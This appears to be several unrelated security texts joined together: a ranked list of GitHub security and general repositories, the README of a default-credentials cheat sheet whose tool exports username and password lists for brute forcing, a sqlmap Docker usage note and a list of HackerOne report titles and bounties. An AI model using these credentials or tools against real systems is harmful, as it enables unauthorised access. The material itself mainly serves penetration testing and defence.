- [**2191**星][8d] [JS] [secgroundzero/warberry](https://github.com/secgroundzero/warberry) WarBerryPi - Tactical Exploitation
- [**2190**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。
- [**2189**星][1y] [jermic/android-crack-tool](https://github.com/jermic/android-crack-tool) 集成了Android开发中常见的一些编译/反编译工具,方便用户对Apk进行逆向分析,提供Apk信息查看功能
- [**2186**星][9d] [Py] [aoncyberlabs/windows-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) 将目标补丁级别与Microsoft漏洞数据库进行比较,以检测目标上可能丢失的补丁
- [**2186**星][15d] [C] [conorpp/u2f-zero](https://github.com/conorpp/u2f-zero) U2F USB令牌优化了物理安全性、可负担性和样式
- [**2184**星][11d] [Java] [google/wycheproof](https://github.com/google/wycheproof) 测试密码库,以对抗已知的攻击。
- [**2184**星][3y] [enddo/awesome-windows-exploitation](https://github.com/enddo/awesome-windows-exploitation) A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom
- [**2182**星][4m] [Py] [jonathansalwan/ropgadget](https://github.com/jonathansalwan/ropgadget) 在二进制文件中搜索小工具,以促进ROP的开发。支持ELF、PE和Mach-O格式的x86、x64、ARM、ARM64、PowerPC、SPARC和MIPS架构。
- [**2177**星][10d] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本
- [**2176**星][3m] [Py] [sensepost/objection](https://github.com/sensepost/objection) 一个由Frida提供支持的运行时移动探索工具包,可以帮助您评估移动应用程序的安全状态,而不需要越狱。
- [**2176**星][2y] [Py] [rub-nds/pret](https://github.com/rub-nds/pret) 打印机漏洞利用工具包
- [**2174**星][3m] [yeahhub/hacking-security-ebooks](https://github.com/yeahhub/hacking-security-ebooks) Top 100 Hacking & Security E-Books (Free Download)
- [**2174**星][10d] [Assembly] [dwelch67/raspberrypi](https://github.com/dwelch67/raspberrypi) Raspberry Pi ARM based bare metal examples
- [**2173**星][11d] [Go] [jetstack/kube-lego](https://github.com/jetstack/kube-lego) 从Let's Encrypt自动请求进入资源的Kubernetes的证书
- [**2172**星][10d] [Py] [nabla-c0d3/sslyze](https://github.com/nabla-c0d3/sslyze) 一个快速而强大的SSL/TLS扫描库。
- [**2172**星][4m] [JS] [iam4x/pokemongo-webspoof](https://github.com/iam4x/pokemongo-webspoof) 在PokémonGo伪造iOS设备GPS位置
- [**2170**星][11d] [Py] [aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) 在Kubernetes集群中寻找安全缺陷
- [**2169**星][11d] [Py] [fsecurelabs/drozer](https://github.com/FSecureLABS/drozer) 领先的Android安全评估框架。
- [**2167**星][10d] [C++] [lloyd/node-memwatch](https://github.com/lloyd/node-memwatch) 一个NodeJS库,用于监视内存使用情况,并发现和隔离泄漏。
- [**2164**星][1y] [Py] [linkedin/qark](https://github.com/linkedin/qark) 查找Android App的漏洞, 支持源码或APK文件
- [**2157**星][10d] [Py] [calebmadrigal/trackerjacker](https://github.com/calebmadrigal/trackerjacker) 映射你没连接到的Wifi网络, 类似于NMap, 另外可以追踪设备
- [**2155**星][10d] [C] [shadowsocks/simple-obfs](https://github.com/shadowsocks/simple-obfs) 一个简单的混淆工具
- [**2154**星][10d] [C] [merbanan/rtl_433](https://github.com/merbanan/rtl_433) 解码来自以433.9 MHz广播的设备(例如温度传感器)的流量
- [**2154**星][11d] [C++] [asmjit/asmjit](https://github.com/asmjit/asmjit) 完全版x86/x64 JIT和AOT的c++汇编
- [**2152**星][7y] [Ruby] [plamoni/siriproxy](https://github.com/plamoni/siriproxy) 苹果Siri的代理服务器
- [**2152**星][10d] [Java] [andotp/andotp](https://github.com/andotp/andotp) Android的开源双因素认证
- [**2149**星][10d] [C++] [openthread/openthread](https://github.com/openthread/openthread) Thread网络协议的开源实现
- [**2148**星][2y] [bluscreenofjeff/red-team-infrastructure-wiki](https://github.com/bluscreenofjeff/red-team-infrastructure-wiki) Wiki to collect Red Team infrastructure hardening resources
- [**2146**星][13d] [Ruby] [mojombo/god](https://github.com/mojombo/god) Ruby进程监控
- [**2145**星][11d] [C] [fragglet/c-algorithms](https://github.com/fragglet/c-algorithms) A library of common data structures and algorithms written in C.
- [**2144**星][3m] [Rust] [indygreg/pyoxidizer](https://github.com/indygreg/pyoxidizer) A modern Python application packaging and distribution tool
- [**2143**星][1y] [TS] [loiane/javascript-datastructures-algorithms](https://github.com/loiane/javascript-datastructures-algorithms)
- [**2142**星][10d] [C++] [xoseperez/espurna](https://github.com/xoseperez/espurna) 基于esp8266设备的家庭自动化固件
- [**2138**星][11d] [Py] [dlitz/pycrypto](https://github.com/dlitz/pycrypto) Python密码工具箱
- [**2136**星][10d] [Py] [thekingofduck/fuzzdicts](https://github.com/thekingofduck/fuzzdicts) Web渗透Fuzz字典
- [**2133**星][10d] [C++] [pytorch/glow](https://github.com/pytorch/glow) 编译器的神经网络硬件加速器
- [**2132**星][10d] [Go] [mosn/mosn](https://github.com/mosn/mosn) MOSN is a cloud native proxy for edge or service mesh.
- [**2132**星][6m] [C++] [darthton/blackbone](https://github.com/darthton/blackbone) Windows内存Hacking库
- [**2131**星][4m] [C] [wireguard/wireguard-monolithic-historical](https://github.com/WireGuard/wireguard-monolithic-historical) 快速,现代,安全内核VPN隧道
- [**2129**星][6m] [Swift] [krzysztofzablocki/lifetimetracker](https://github.com/krzysztofzablocki/lifetimetracker) :尽早发现保留周期/内存泄漏。
- [**2129**星][10d] [Go] [google/trillian](https://github.com/google/trillian) :一个透明的、高度可伸缩的、可以通过密码验证的数据存储。
- [**2128**星][11d] [Py] [nixawk/pentest-wiki](https://github.com/nixawk/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.
- [**2128**星][2m] [Go] [mpolden/echoip](https://github.com/mpolden/echoip) IP地址查询服务
- [**2126**星][3m] [Java] [jeremylong/dependencycheck](https://github.com/jeremylong/dependencycheck) 软件组件分析实用程序,用于检测应用程序依赖项中公开披露的漏洞
- [**2124**星][10d] [Py] [momosecurity/aswan](https://github.com/momosecurity/aswan) 陌陌风控系统静态规则引擎,零基础简易便捷的配置多种复杂规则,实时高效管控用户异常行为。
- [**2117**星][10d] [C] [darkk/redsocks](https://github.com/darkk/redsocks) 使用防火墙将任何TCP连接重定向到SOCKS或HTTPS代理,因此重定向可以是系统范围的或网络范围的。
- [**2116**星][12d] [Java] [tdebatty/java-string-similarity](https://github.com/tdebatty/java-string-similarity) Implementation of various string similarity and distance algorithms: Levenshtein, Jaro-winkler, n-Gram, Q-Gram, Jaccard index, Longest Common Subsequence edit distance, cosine similarity ...
- [**2116**星][10d] [Go] [gdamore/tcell](https://github.com/gdamore/tcell) 另一个终端包,在某些方面类似于termbox,但在其他方面更好。
- [**2115**星][11d] [YARA] [yara-rules/rules](https://github.com/yara-rules/rules) Repository of yara rules
- [**2113**星][11d] [obfuscator-llvm/obfuscator](https://github.com/obfuscator-llvm/obfuscator) Obfuscator-LLVM
- [**2112**星][4m] [tanprathan/mobileapp-pentest-cheatsheet](https://github.com/tanprathan/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics.
- [**2112**星][10d] [Go] [bitnami-labs/sealed-secrets](https://github.com/bitnami-labs/sealed-secrets) 一种用于单向加密秘密的Kubernetes控制器和工具
- [**2111**星][7d] [Go] [maxmcd/webtty](https://github.com/maxmcd/webtty) 通过WebRTC共享一个终端会话
- [**2109**星][10d] [C] [ralim/ts100](https://github.com/ralim/ts100) 该特性通过miniware打包了TS100 iron的备用开源固件。
- [**2108**星][4m] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) 使用Passive Sources, Search Engines, Pastebins, Internet Archives等查找子域名
<details>
<summary>查看详情</summary>
## Misc
- 纯被动
- stdin/stdout,集成到工作流
## 安装
- `go get -v github.com/projectdiscovery/subfinder/cmd/subfinder`
- `go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder` : 更新
</details>
- [**2107**星][9d] [TS] [microsoft/vscode-react-native](https://github.com/microsoft/vscode-react-native) VSCode extension for React Native - supports debugging and editor integration
- [**2106**星][10d] [C] [tinyproxy/tinyproxy](https://github.com/tinyproxy/tinyproxy) OSIX操作系统的轻量级HTTP/HTTPS代理守护进程
- [**2103**星][4m] [Py] [welliamcao/opsmanage](https://github.com/welliamcao/opsmanage) 自动化运维平台: 代码及应用部署CI/CD、资产管理CMDB、计划任务管理平台、SQL审核|回滚、任务调度、站内WIKI
- [**2103**星][11d] [Py] [cea-sec/miasm](https://github.com/cea-sec/miasm) Python中的逆向工程框架
- [**2102**星][10d] [C] [hashcat/hashcat-legacy](https://github.com/hashcat/hashcat-legacy) 先进的基于cpu的密码恢复实用程序
- [**2100**星][10d] [Py] [hunters-forge/threathunter-playbook](https://github.com/hunters-forge/ThreatHunter-Playbook) A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
- [**2091**星][11d] [Java] [jindrapetrik/jpexs-decompiler](https://github.com/jindrapetrik/jpexs-decompiler) Flash反编译器
- [**2091**星][4m] [Py] [j3ssie/osmedeus](https://github.com/j3ssie/osmedeus) 完全自动化的攻击安全框架的侦察和漏洞扫描
- [**2090**星][5m] [C] [dekunukem/nintendo_switch_reverse_engineering](https://github.com/dekunukem/nintendo_switch_reverse_engineering) 看看Joycon和任天堂Switch的内部工作原理
- [**2086**星][5m] [infosecn1nja/ad-attack-defense](https://github.com/infosecn1nja/ad-attack-defense) (文档)活动目录的攻击和防御,使用现代后渗透的谍报活动
- [**2085**星][10d] [C] [ntop/ndpi](https://github.com/ntop/ndpi) 开源深包检测软件工具包
- [**2083**星][10d] [Go] [ffuf/ffuf](https://github.com/ffuf/ffuf) 用Go编写的快速web fuzzer
- [**2081**星][2y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) BurpSuite Intruder Payload收集
- [**2078**星][12d] [toolswatch/blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) Black Hat 武器库
- [**2065**星][2y] [Py] [derv82/wifite](https://github.com/derv82/wifite) 自动化无线攻击工具
- [**2064**星][4m] [C#] [lucasg/dependencies](https://github.com/lucasg/dependencies) :重写旧的遗留软件“depends.exe"在c#中为Windows开发人员解决dll加载依赖问题
- [**2060**星][10d] [C++] [wrbug/dumpdex](https://github.com/wrbug/dumpdex) Android脱壳
- [**2058**星][11d] [C++] [powerdns/pdns](https://github.com/powerdns/pdns) owerDNS授权服务器和dnsdist(功能强大的DNS负载平衡器)的源码
- [**2057**星][9d] [C] [minhaskamal/creepycodecollection](https://github.com/minhaskamal/creepycodecollection) A Nonsense Collection of Disgusting Codes (quine-polyglot-code-golf-obfuscated-signature-creepy-codes-mandelbrot-esoteric-language-esoteric-programming-strange-golfing-spooky-weird)
- [**2052**星][4m] [C++] [mhammond/pywin32](https://github.com/mhammond/pywin32) Python for Windows (pywin32)扩展
- [**2049**星][10d] [Py] [scrapy/scrapyd](https://github.com/scrapy/scrapyd) 一个运行scrapy的服务守护进程
- [**2049**星][10m] [HTML] [nikolait/googlescraper](https://github.com/nikolait/googlescraper) 一个Python模块来抓取几个搜索引擎(比如谷歌,Yandex, Bing, Duckduckgo,…)包括异步联网支持。
- [**2048**星][12d] [Go] [floyernick/data-structures-and-algorithms](https://github.com/floyernick/data-structures-and-algorithms) Data Structures and Algorithms implementation in Go
- [**2048**星][10d] [dloss/python-pentest-tools](https://github.com/dloss/python-pentest-tools) 可用于渗透测试的Python工具收集
- [**2047**星][12d] [C] [xoreaxeaxeax/rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge) 某些x86 cpu中的硬件后门
- [**2047**星][4m] [Jupyter Notebook] [cyb3rward0g/helk](https://github.com/cyb3rward0g/helk) 对ELK栈进行分析,具备多种高级功能,例如SQL声明性语言,图形,结构化流,机器学习等
- [**2045**星][11d] [Java] [adoptopenjdk/jitwatch](https://github.com/adoptopenjdk/jitwatch) 用于Java HotSpot JIT编译器的日志分析器/可视化器。检查内联决策、热方法、字节码和程序集。在JavaFX用户界面中查看结果。
- [**2039**星][4m] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/freepac) 科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程
- [**2038**星][11d] [jadagates/shadowsocksbio](https://github.com/jadagates/shadowsocksbio) 记录一下SS的前世今生,以及一个简单的教程总结
- [**2036**星][13d] [Go] [skynetservices/skydns](https://github.com/skynetservices/skydns) DNS service discovery for etcd
- [**2032**星][10d] [Lua] [vulnerscom/nmap-vulners](https://github.com/vulnerscom/nmap-vulners) 基于Vulners.com API的NSE脚本
- [**2032**星][3y] [Swift] [urinx/iosapphook](https://github.com/urinx/iosapphook) 专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook
- [**2029**星][5y] [CoffeeScript] [shadowsocks/shadowsocks-gui](https://github.com/shadowsocks/shadowsocks-gui) Shadowsocks GUI client
- [**2028**星][10d] [JS] [ghacksuserjs/ghacks-user.js](https://github.com/ghacksuserjs/ghacks-user.js) 一个持续进行的综合user.js模板,用于配置和强化Firefox的隐私,安全性和防指纹识别功能
- [**2024**星][11d] [PHP] [symfony/panther](https://github.com/symfony/panther) A browser testing and web crawling library for PHP and Symfony
- [**2023**星][4m] [C] [adaway/adaway](https://github.com/adaway/adaway) AdAway is an open source ad blocker for Android using the hosts file.
- [**2022**星][6m] [Swift] [github/softu2f](https://github.com/github/softu2f) macOS的U2F认证软件
- [**2021**星][3m] [Perl] [spiderlabs/owasp-modsecurity-crs](https://github.com/spiderlabs/owasp-modsecurity-crs) 一套用于ModSecurity或兼容的web应用程序防火墙的通用攻击检测规则
- [**2021**星][10d] [C] [kevinoconnor/klipper](https://github.com/kevinoconnor/klipper) 一个3d打印机固件
- [**2019**星][10d] [C] [chipsec/chipsec](https://github.com/chipsec/chipsec) 分析PC平台的安全性, 包括硬件、系统固件(BIOS/UEFI)和平台组件
- [**2018**星][7d] [PHP] [jae-jae/querylist](https://github.com/jae-jae/querylist)
- [**2016**星][10d] [Go] [yahoo/gryffin](https://github.com/yahoo/gryffin) 一个大规模的网络安全扫描平台
- [**2016**星][11d] [C] [mgba-emu/mgba](https://github.com/mgba-emu/mgba) mGBA Game Boy高级仿真器
- [**2015**星][10d] [TS] [snyk/snyk](https://github.com/snyk/snyk) 查找并修复开源软件依赖项中的已知漏洞
- [**2014**星][10d] [Py] [minimaxir/facebook-page-post-scraper](https://github.com/minimaxir/facebook-page-post-scraper) 数据爬取的Facebook页面,以及附带的代码博客文章如何从Facebook页面文章抓取数据进行统计分析
- [**2011**星][4m] [JS] [thealgorithms/javascript](https://github.com/thealgorithms/javascript) 用于Javascript实现的所有算法
- [**2006**星][10d] [Go] [minishift/minishift](https://github.com/minishift/minishift) 一个通过在VM中运行单节点OpenShift集群来帮助您在本地运行OpenShift的工具。
- [**2004**星][8d] [Py] [gerapy/gerapy](https://github.com/gerapy/gerapy) Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Django and Vue.js
- [**2004**星][10d] [C] [probablycorey/wax](https://github.com/probablycorey/wax) Wax is now being maintained by alibaba
- [**2003**星][6m] [olivierlaflamme/cheatsheet-god](https://github.com/olivierlaflamme/cheatsheet-god) Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
- [**2002**星][10d] [ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) Inspired by
- [**2002**星][3m] [Java] [kyson/androidgodeye](https://github.com/kyson/androidgodeye) 一个性能监测工具,如Android的“Android Studio profiler”,你可以很容易地监测你的应用程序的性能实时在pc浏览器
- [**1994**星][5m] [C++] [acidanthera/lilu](https://github.com/acidanthera/Lilu) 在macOS上任意kext和进程补丁
- [**1992**星][10d] [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) Collection of the cheat sheets useful for pentesting
- [**1990**星][10d] [Java] [tiann/epic](https://github.com/tiann/epic) 动态java方法AOP钩子用于Android(Dexposed on ART的延续),支持4.0~10.0
- [**1988**星][10d] [Py] [lanbing510/doubanspider](https://github.com/lanbing510/doubanspider) 豆瓣读书的爬虫
- [**1987**星][3m] [Go] [zalando/skipper](https://github.com/zalando/skipper) 进行服务整合的HPPT路由器和反向代理
- [**1987**星][12m] [Java] [fuzion24/justtrustme](https://github.com/fuzion24/justtrustme) An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning
- [**1987**星][11d] [C] [cesanta/mongoose-os](https://github.com/cesanta/mongoose-os) 物联网固件开发框架
- [**1985**星][2y] [Py] [dormymo/spiderkeeper](https://github.com/dormymo/spiderkeeper) 为scrapy/开源scrapinghub管理ui
- [**1983**星][11d] [C++] [tum-vision/lsd_slam](https://github.com/tum-vision/lsd_slam) 一种实时监控SLAM的新方法。
- [**1979**星][10d] [17mon/china_ip_list](https://github.com/17mon/china_ip_list) IPList for China by IPIP.NET
- [**1976**星][5y] [Py] [ziggear/shadowsocks](https://github.com/ziggear/shadowsocks) backup of https://github.com/shadowsocks/shadowsocks
- [**1976**星][6m] [Py] [lanjelot/patator](https://github.com/lanjelot/patator) 一个多用途的爆破工具,具有模块化的设计和灵活的使用
- [**1975**星][10d] [JS] [robinmoisson/staticrypt](https://github.com/robinmoisson/staticrypt) Password protect a static HTML page
- [**1975**星][10d] [Py] [gaojiuli/gain](https://github.com/gaojiuli/gain) 基于asyncio的Web爬虫框架
- [**1974**星][5m] [C] [microsoft/procdump-for-linux](https://github.com/microsoft/procdump-for-linux) Linux 版本的 ProcDump
- [**1971**星][10d] [PS] [fireeye/flare-vm](https://github.com/fireeye/flare-vm) 火眼发布用于 Windows 恶意代码分析的虚拟机:FLARE VM
- [**1969**星][10d] [rmerl/asuswrt-merlin.ng](https://github.com/rmerl/asuswrt-merlin.ng) 华硕路由器的第三方固件(更新的代码库)
- [**1967**星][3y] [C#] [lazocoder/windows-hacks](https://github.com/lazocoder/windows-hacks) 创造性和不寻常的事情,可以做与Windows API。
- [**1966**星][11d] [Go] [hyperhq/hyperd](https://github.com/hyperhq/hyperd) HyperContainer Daemon
- [**1963**星][10d] [Py] [lijiejie/subdomainsbrute](https://github.com/lijiejie/subdomainsbrute) 子域名爆破
- [**1963**星][10d] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener
- [**1960**星][10d] [JS] [weichiachang/stacks-cli](https://github.com/weichiachang/stacks-cli) 从终端检查网站堆栈
- [**1960**星][10d] [Py] [anorov/cloudflare-scrape](https://github.com/anorov/cloudflare-scrape) 一个绕过Cloudflare反机器人页面的Python模块。
- [**1959**星][10d] [Py] [jinnlynn/genpac](https://github.com/jinnlynn/genpac) 基于gfwlist的多种代理软件配置文件生成工具,支持自定义规则,目前可生成的格式有pac, dnsmasq, wingy。
- [**1956**星][13d] [JS] [diafygi/gethttpsforfree](https://github.com/diafygi/gethttpsforfree) 获得一个免费的HTTPS证书,而无需安装任何软件或与任何人共享您的私钥
- [**1955**星][1y] [C++] [facebookresearch/elf](https://github.com/facebookresearch/elf) An End-To-End, Lightweight and Flexible Platform for Game Research
- [**1954**星][10d] [Py] [python-security/pyt](https://github.com/python-security/pyt) Python Web App 安全漏洞检测和静态分析工具
- [**1953**星][11d] [C++] [iagox86/dnscat2](https://github.com/iagox86/dnscat2) 在 DNS 协议上创建加密的 C&C channel
- [**1953**星][13d] [C++] [googlecreativelab/open-nsynth-super](https://github.com/googlecreativelab/open-nsynth-super) NSynth算法的实验物理接口
- [**1941**星][10d] [Py] [pwnlandia/mhn](https://github.com/pwnlandia/mhn) 一个用于管理和收集蜜罐数据的集中式服务器
- [**1940**星][11d] [TS] [rangle/augury](https://github.com/rangle/augury) Angular调试和可视化工具
- [**1937**星][10d] [Py] [trailofbits/manticore](https://github.com/trailofbits/manticore) 动态二进制分析工具,支持符号执行(symbolic execution)、污点分析(taint analysis)、运行时修改。
- [**1937**星][2y] [Py] [aploium/zmirror](https://github.com/aploium/zmirror) 一个Python反向HTTP代理程序, 用于快速、简单地创建别的网站的镜像, 自带本地文件缓存、CDN支持
- [**1933**星][10d] [C] [ntop/n2n](https://github.com/ntop/n2n) 一个轻VPN软件,使它很容易创建绕过中间防火墙的虚拟网络
- [**1931**星][12d] [C] [retroplasma/earth-reverse-engineering](https://github.com/retroplasma/earth-reverse-engineering) 逆向谷歌的3D卫星模式
- [**1930**星][11d] [Py] [lorien/grab](https://github.com/lorien/grab) Web抓取框架
- [**1928**星][10d] [onethawt/idaplugins-list](https://github.com/onethawt/idaplugins-list) IDA插件收集
- [**1927**星][12d] [JS] [coreybutler/node-windows](https://github.com/coreybutler/node-windows) Windows support for Node.JS scripts (daemons, eventlog, UAC, etc).
|
# Default Credentials Cheat Sheet
<p align="center">
<img src="https://media.moddb.com/cache/images/games/1/65/64034/thumb_620x2000/Lockpicking.jpg"/>
</p>
**One place for all the default credentials to assist pentesters during an engagement, this document has several products default login/password gathered from multiple sources.**
> P.S : Most of the credentials were extracted from changeme,routersploit and Seclists projects, you can use these tools to automate the process https://github.com/ztgrace/changeme , https://github.com/threat9/routersploit (kudos for the awesome work)
- [x] Project in progress
## Motivation
- One document for the most known vendors default credentials
- Assist pentesters during a pentest/red teaming engagement
- **Helping the Blue teamers to secure the company infrastructure assets by discovering this security flaw in order to mitigate it**. See
[OWASP Guide [WSTG-ATHN-02] - Testing_for_Default_Credentials](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials "OWASP Guide")
#### Short stats of the dataset
| | Product/Vendor | Username | Password |
| --- | --- | --- | --- |
| **count** | 3522 | 3522 | 3522 |
| **unique** | 1235 | 1099 | 1631 |
| **top** | Oracle| <blank> | <blank> |
| **freq** | 235 | 725 | 461 |
#### Sources
- [Changeme](https://github.com/ztgrace/changeme "Changeme project")
- [Routersploit]( https://github.com/threat9/routersploit "Routersploit project")
- [betterdefaultpasslist]( https://github.com/govolution/betterdefaultpasslist "betterdefaultpasslist")
- [Seclists]( https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials "Seclist project")
- [ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) (thanks to @noraj)
- Vendors documentations/blogs
## Installation & Usage
The Default Credentials Cheat Sheet tool is available on [pypi](https://pypi.org/project/defaultcreds-cheat-sheet/)
```bash
$ pip3 install defaultcreds-cheat-sheet
$ creds search tomcat
```
Tested on:
* Kali linux
* Ubuntu
* Lubuntu
##### Manual Installation
```bash
$ git clone https://github.com/ihebski/DefaultCreds-cheat-sheet
$ pip3 install -r requirements.txt
$ cp creds /usr/bin/ && chmod +x /usr/bin/creds
$ creds search tomcat
```
#### Creds script
* Usage Guide
```bash
# Search for product creds
➤ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat (web) | tomcat | tomcat |
| apache tomcat (web) | admin | admin |
...
+----------------------------------+------------+------------+
# Update records
➤ creds update
Check for new updates...🔍
New updates are available 🚧
[+] Download database...
# Export Creds to files (could be used for brute force attacks)
➤ creds search tomcat export
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat (web) | tomcat | tomcat |
| apache tomcat (web) | admin | admin |
...
+----------------------------------+------------+------------+
[+] Creds saved to /tmp/tomcat-usernames.txt , /tmp/tomcat-passwords.txt 📥
```
[![asciicast](https://asciinema.org/a/526599.svg)](https://asciinema.org/a/526599)
#### Pass Station
[noraj][noraj] created CLI & library to search for default credentials among this database using `DefaultCreds-Cheat-Sheet.csv`.
The tool is named [Pass Station][pass-station] ([Doc][ps-doc]) and has some powerful search feature (fields, switches, regexp, highlight) and output (simple table, pretty table, JSON, YAML, CSV).
[![asciicast](https://asciinema.org/a/397713.svg)](https://asciinema.org/a/397713)
[noraj]:https://pwn.by/noraj/
[pass-station]:https://github.com/sec-it/pass-station
[ps-doc]:https://sec-it.github.io/pass-station/
## Contribute
If you cannot find the password for a specific product, please submit a pull request to update the dataset.<br>
> ### Disclaimer
> **For educational purposes only, use it at your own responsibility.**
|
# k0st/alpine-sqlmap-git
Dockerized sqlmap from github (git)
Image is based on the [gliderlabs/alpine](https://registry.hub.docker.com/u/gliderlabs/alpine/) base image
## Docker image size
[![Latest](https://badge.imagelayers.io/k0st/alpine-sqlmap-git.svg)](https://imagelayers.io/?images=k0st/alpine-sqlmap-git:latest 'latest')
## Docker image usage
```
docker run --rm -it k0st/alpine-sqlmap-git -u http://vuln.site.com/i?=1 -p i
```
## Examples
Run scan on https://www.example.org:
```
docker run --rm -it k0st/alpine-sqlmap-git -u http://vuln.site.com/i?=1 -p i
```
### Todo
- [ ] Check volume and data
|
### Title
Получение предложенных фотографий паблику
#### URL
https://hackerone.com/reports/227781
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$200
---
### Title
Session Cookie Without Secure Flag,
#### URL
https://hackerone.com/reports/343095
#### Severity score
null
#### Reporter
tangent90ninety
### Bounty paid
null
---
### Title
Missing resource identifier encoding may lead to security vulnerabilities
#### URL
https://hackerone.com/reports/803922
#### Severity score
4.8
#### Reporter
jobert
### Bounty paid
null
---
### Title
Files Drop: WebDAV endpoint is leaking existence of resources
#### URL
https://hackerone.com/reports/187460
#### Severity score
3.7
#### Reporter
lukasreschke
### Bounty paid
null
---
### Title
[health.mail.ru] Раскрытие SSI сценариев
#### URL
https://hackerone.com/reports/283492
#### Severity score
0
#### Reporter
bobrov
### Bounty paid
$150
---
### Title
Developper's websites are easily accessibles leading to massive information disclosure
#### URL
https://hackerone.com/reports/643882
#### Severity score
null
#### Reporter
sicarius
### Bounty paid
$300
---
### Title
file full path discloser.
#### URL
https://hackerone.com/reports/116057
#### Severity score
null
#### Reporter
acc_122
### Bounty paid
null
---
### Title
Способ узнать имя человека удаленной страницы
#### URL
https://hackerone.com/reports/193419
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
null
---
### Title
CMS Information Disclosure
#### URL
https://hackerone.com/reports/17297
#### Severity score
null
#### Reporter
gangw4n
### Bounty paid
null
---
### Title
Aapp name leakage on economy history page
#### URL
https://hackerone.com/reports/349681
#### Severity score
5
#### Reporter
xpaw
### Bounty paid
$500
---
### Title
Boards leak private label names and desciptions
#### URL
https://hackerone.com/reports/162147
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
Nginx version disclosure via response header
#### URL
https://hackerone.com/reports/183245
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
File name and folder enumeration.
#### URL
https://hackerone.com/reports/118688
#### Severity score
null
#### Reporter
derision
### Bounty paid
$500
---
### Title
PHPInfo Page on www.razer.ru
#### URL
https://hackerone.com/reports/744573
#### Severity score
null
#### Reporter
l00ph0le
### Bounty paid
null
---
### Title
Uninitialized read in exif_process_IFD_in_MAKERNOTE
#### URL
https://hackerone.com/reports/516237
#### Severity score
7.5
#### Reporter
chamal
### Bounty paid
$1,500
---
### Title
Gain access to random information via group chat "about" property
#### URL
https://hackerone.com/reports/254285
#### Severity score
5.9
#### Reporter
3c75
### Bounty paid
$1,000
---
### Title
Oracle WebCenter Sites Support Tools available and Information disclosure (/cs/Satellite)
#### URL
https://hackerone.com/reports/164581
#### Severity score
null
#### Reporter
rpinuaga
### Bounty paid
$100
---
### Title
Flash Player information disclosure (etc.) CVE-2015-3044, PSIRT-3298
#### URL
https://hackerone.com/reports/63324
#### Severity score
null
#### Reporter
jouko
### Bounty paid
$2,000
---
### Title
Sensitive data leaks [username, password, keys]
#### URL
https://hackerone.com/reports/961170
#### Severity score
null
#### Reporter
anjpan
### Bounty paid
null
---
### Title
API method at api.my.games allows to enumerate user emails
#### URL
https://hackerone.com/reports/758401
#### Severity score
null
#### Reporter
mobius07
### Bounty paid
$400
---
### Title
Internal Ports Scanning via Blind SSRF
#### URL
https://hackerone.com/reports/263169
#### Severity score
null
#### Reporter
tungpun
### Bounty paid
null
---
### Title
Seemingly sensitive information at /api/v2/zones
#### URL
https://hackerone.com/reports/165131
#### Severity score
null
#### Reporter
sameoldstory
### Bounty paid
$50
---
### Title
WordPress Vulnerabilities: User Enumeration, Vulnerable Akismet Plugin, XML-RPC Interface available
#### URL
https://hackerone.com/reports/146093
#### Severity score
null
#### Reporter
vivek-p
### Bounty paid
null
---
### Title
Shared file link - password protection bypass under certain conditions
#### URL
https://hackerone.com/reports/231917
#### Severity score
null
#### Reporter
icewater
### Bounty paid
$50
---
### Title
Talk / spreed: Disclosure of Room names and participants for password protected rooms
#### URL
https://hackerone.com/reports/428010
#### Severity score
null
#### Reporter
foobar7
### Bounty paid
$50
---
### Title
Information disclosure at lite.uber.com
#### URL
https://hackerone.com/reports/128853
#### Severity score
null
#### Reporter
kusl
### Bounty paid
null
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/184558
#### Severity score
null
#### Reporter
0x01alka
### Bounty paid
null
---
### Title
ActiveStorage service's signed URLs can be hijacked via AppCache+Cookie stuffing trick when using GCS or DiskService
#### URL
https://hackerone.com/reports/407319
#### Severity score
7.4
#### Reporter
rosa
### Bounty paid
null
---
### Title
PHPinfo page on http://█████.callstats.io
#### URL
https://hackerone.com/reports/907701
#### Severity score
null
#### Reporter
manantch
### Bounty paid
null
---
### Title
Personal information disclosure on a DoD website
#### URL
https://hackerone.com/reports/188149
#### Severity score
null
#### Reporter
spam404
### Bounty paid
null
---
### Title
don't leak Server version for assets.gratipay.com
